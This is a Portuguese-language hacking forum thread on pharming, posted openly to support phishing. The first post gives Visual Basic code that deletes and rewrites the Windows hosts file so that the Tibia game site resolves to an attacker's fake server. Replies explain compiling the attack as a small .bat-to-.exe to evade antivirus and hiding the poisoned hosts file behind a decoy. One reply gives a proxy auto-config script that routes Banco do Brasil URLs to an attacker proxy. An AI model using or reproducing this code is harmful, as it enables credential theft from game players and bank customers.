Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Entenda - Pharming

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Dica Entenda - Pharming


    O que e Pharming? Em informática Pharming é o termo atribuído ao ataque baseado na técnica DNS cache poisoning (envenenamento de cache DNS) que, consiste em corromper o DNS (Sistema de Nomes de Domínio ou Domain Name System) em uma rede de computadores, fazendo com que a URL (Uniform Resource Locator ou Localizador Uniforme de Recursos) de um site passe a apontar para um servidor diferente do original.

    Ao digitar a URL (endereço) do site que deseja acessar, um banco por exemplo, o servidor DNS converte o endereço em um número IP, correspondente ao do servidor do banco. Se o servidor DNS estiver vulnerável a um ataque de Pharming, o endereço poderá apontar para uma página falsa hospedada em outro servidor com outro endereço IP, que esteja sob controle de um golpista.

    Os golpistas geralmente copiam fielmente as páginas das instituições, criando a falsa impressão que o usuário está no site desejado e induzindo-o a fornecer seus dados privados como login ou números de contas e senha que serão armazenados pelo servidor falso.


    Exemplo de Pharming - VB Code.
    Private Sub Form_Load()
    Dim file As Integer
    file = FreeFile
    On Error Resume Next

    'CONFIGURAÇÃO
    '/================================================== ======================\
    ip_tibia = "62.146.69.27" 'IP da página do Tibia. Não mexa aqui. |
    '\================================================ ========================/
    '/================================================== ======================\
    ip_servidor_fake = "" 'Coloque aqui o IP do servidor da sua página fake. |
    '\================================================ ========================/

    pharming = "" & ip_servidor_fake & " " & ip_tibia 'Não mexa aqui.

    ' CRÉDITOS
    '/==================================\
    '|NAME: |
    '|PharmingTool for Tibia 1.0 |
    '|==================================|
    '|PROGRAMMER |
    '|Colt7r |
    '|FireHash Security Team |
    '|==================================|
    '|CONTACT |
    '|brasil.red-mexico.com #FireHash |
    '\==================================/

    'Apagando arquivo HOSTS.
    Kill "C:\Windows\system32\drivers\etc\hosts"

    'Escrevendo no arquivo HOSTS. (C:\)
    Open "C:\Windows\system32\drivers\etc\hosts" For Output As file
    Print #file, pharming
    Close file

    Open "D:\Windows\system32\drivers\etc\hosts" For Output As file
    Print #file, pharming
    Close file
    End
    End Sub
    Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    sigpic




    R.I.P - 2008 —— 2015
    Capiroto, descanse em paz!

    русский Империя

    Phishing's job. PM me!! $$$
    Similar Threads
    Tags: capiroto, pharming, phishing
    • Top
  • Font Size
    #2
    Obrigado por Compartilha !

    ----------------------------------------------------------------------------------------------------------------------------------------

    Programar é arte, ficar louco faz parte
    Dacrusil // GHS
    • Top

    Comment

    • Font Size
      #3
      Postado Originalmente por Capiroto Ver Post

      O que e Pharming? Em informática Pharming é o termo atribuído ao ataque baseado na técnica DNS cache poisoning (envenenamento de cache DNS) que, consiste em corromper o DNS (Sistema de Nomes de Domínio ou Domain Name System) em uma rede de computadores, fazendo com que a URL (Uniform Resource Locator ou Localizador Uniforme de Recursos) de um site passe a apontar para um servidor diferente do original.

      Ao digitar a URL (endereço) do site que deseja acessar, um banco por exemplo, o servidor DNS converte o endereço em um número IP, correspondente ao do servidor do banco. Se o servidor DNS estiver vulnerável a um ataque de Pharming, o endereço poderá apontar para uma página falsa hospedada em outro servidor com outro endereço IP, que esteja sob controle de um golpista.

      Os golpistas geralmente copiam fielmente as páginas das instituições, criando a falsa impressão que o usuário está no site desejado e induzindo-o a fornecer seus dados privados como login ou números de contas e senha que serão armazenados pelo servidor falso.


      Exemplo de Pharming - VB Code.


      Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      Ai eu fiquei com uma duvida sobre "pharming", eu hospedo ela? e quando e deixo ela funcionando ? como minha pagina fake? ai quando ele digitar o DNS(dominio) no browser dele o meu arquivo pharming vai começar a trabalhar ?

      ex: se o site é vul a pharming, eu hospedo meu pharming em outro local? ou é de outra forma ?

      Se me bloqueiam de um lado, eu me infiltro do outro
      Eu sou pior que um rato eu entro pelo esgoto
      Voltei de preto pro combate sem medo de apanhar
      Eu não sou Jesus Cristo então vou revidar!





      É meu fan? Use minha fan bar




      A nossa maior glória não reside no fato de nunca cairmos, mas sim em levantarmo-nos sempre depois de cada queda.
      • Top

      Comment

      • Font Size
        #4
        Boa dica!!! o único problema é que fazer um código desse em um compilador tipo VB e Delphi é meio embaçado, pois os AVS já reconhecem ou detectam como suspeito o server (ficam analisando rodando aquelas engrenagens, tipo como o Avast faz), não pelo código do pharming, mas pelo source do compilador, que ja é manjado demais

        O único jeito de se fazer um pharming local com sucesso é fazendo via .bat e dps compilar pra .exe, eu testei aqui no pc de um amigo que tem o Avira instalado e não pegou o server nem na análse rsrs.

        flw.
        • Top

        Comment

        • Font Size
          #5
          Postado Originalmente por rectanglephishing Ver Post
          Boa dica!!! o único problema é que fazer um código desse em um compilador tipo VB e Delphi é meio embaçado, pois os AVS já reconhecem ou detectam como suspeito o server (ficam analisando rodando aquelas engrenagens, tipo como o Avast faz), não pelo código do pharming, mas pelo source do compilador, que ja é manjado demais

          O único jeito de se fazer um pharming local com sucesso é fazendo via .bat e dps compilar pra .exe, eu testei aqui no pc de um amigo que tem o Avira instalado e não pegou o server nem na análse rsrs.

          flw.
          eu vi um video que um cara fazia via .bat e ele ainda coloca comando pra esconder o hosts envenenado e ele deixa visivel um host como sendo orignal mas falso pra que quem for mexer e ver que nao ha nada de errado com o hosts..

          passa ai o teu procedimento Lek.
          "O conhecimento é OURO, saber aplicar é Diamante".
          • Top

          Comment

          • Font Size
            #6
            Eu faço desse mesmo jeito aí que o Capiroto ensinou, mas só que em .bat. Daí o arquivo não passa de 1kb de tamanho dps transformo pra .exe e ja era .

            Particularmente em relação ao que vc falou que o cara oculta o hosts falso e deixa à mostra o verdadeiro, eu não entendi muito, porque não pode ficar dois arquivos de mesmo nome na mesma pasta "c:\windows\system32\drivers\etc" pois viria a mensagem pergutando se quer substituir o arquivo existente (pelo falso no caso). Ou seja, do todo jeito sempre terá que ficar 1 apenas no dirtório e este método acima sugerido pelo Capiroto é o melhor e mais eficiente, desde que seja feito em .bat e convertido pra .exe dps, nesses compiladores tipo VB,DElphi, Dev C++ já tá manjado, tanto pelo source quanto pelo tamanho final que fica grande em relação ao .bat.

            Faça como estou dizendo que vc conseguirá burlar praticamente qualquer AV .

            Se achar o referido vídeo envie pra mim que quero ver como foi feito essa "engenhoca"

            digkeys123@gmail.com

            Flw.
            • Top

            Comment

            • Font Size
              #7
              Postado Originalmente por rectanglephishing Ver Post
              Eu faço desse mesmo jeito aí que o Capiroto ensinou, mas só que em .bat. Daí o arquivo não passa de 1kb de tamanho dps transformo pra .exe e ja era .

              Particularmente em relação ao que vc falou que o cara oculta o hosts falso e deixa à mostra o verdadeiro, eu não entendi muito, porque não pode ficar dois arquivos de mesmo nome na mesma pasta "c:\windows\system32\drivers\etc" pois viria a mensagem pergutando se quer substituir o arquivo existente (pelo falso no caso). Ou seja, do todo jeito sempre terá que ficar 1 apenas no dirtório e este método acima sugerido pelo Capiroto é o melhor e mais eficiente, desde que seja feito em .bat e convertido pra .exe dps, nesses compiladores tipo VB,DElphi, Dev C++ já tá manjado, tanto pelo source quanto pelo tamanho final que fica grande em relação ao .bat.

              Faça como estou dizendo que vc conseguirá burlar praticamente qualquer AV .

              Se achar o referido vídeo envie pra mim que quero ver como foi feito essa "engenhoca"

              digkeys123@gmail.com

              Flw.
              rectanglephishing vai ficar assim:

              host (visivel)
              hosts (verdadeiro do sistema , mas envenenado) vai estar oculto -h

              sacou a malicia?? no sistema o nome host nao existe , o verdadeiro se chama hosts com "s" no final e vai estar oculto

              o cara vai se confundir como sendo verdadeiro o host (falso) E VAI ABRIR E VER QUE ESTA TUDO NORMAL
              "O conhecimento é OURO, saber aplicar é Diamante".
              • Top

              Comment

              • Font Size
                #8
                res

                Entendi, então o que eu disse acima tem lógica msm, (não tem como colocar 2 arquivos de msm nome em um único diretório)
                • Top

                Comment

                • Font Size
                  #9
                  exato.

                  nao fiz na pratica..

                  mas acredito que vai o windows nao vai executar esse .bat . já que o windows nao aceitar comando externo..

                  e entao ??????????????
                  "O conhecimento é OURO, saber aplicar é Diamante".
                  • Top

                  Comment

                  • Font Size
                    #10
                    Obrigado por compartilha me ajudou Muito.
                    • Top

                    Comment

                    • Font Size
                      #11
                      kl proxy

                      Eu prefiro usar kl proxy, um arquivo feito em delphi injeta um link proxy no navegador
                      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... dai quando a pessoa vai acessar o banco ja vai cair direito na sua fake ai é so correr pro abraço


                      function FindProxyForURL(url, host)
                      {
                      valor3 = "PROXY 187.109.161.63"; // aq vai é o servidor onde ta a fake com valor3 ou seja quando a pessoa acessar o bb vai retornar para o fake

                      bb1 = "http://bb.com.br/*";
                      bb2="http://www.bb.com.br/*";

                      if (shExpMatch(url, bb1)){return valor3;}
                      if (shExpMatch(url, bb2)){return valor3;}

                      return "DIRECT";
                      }
                      • Top

                      Comment

                      • Font Size
                        #12
                        Dúvida

                        Como eu faço para que ao acessar o facebook, por exemplo, a pessoa seja redirecionada à página fake criada por mim, sendo que eu tenho acesso ao computador que acessará o site?

                        Obrigado.
                        • Top

                        Comment

                        Anterior template Avançar
                        X
                        Working...
                        X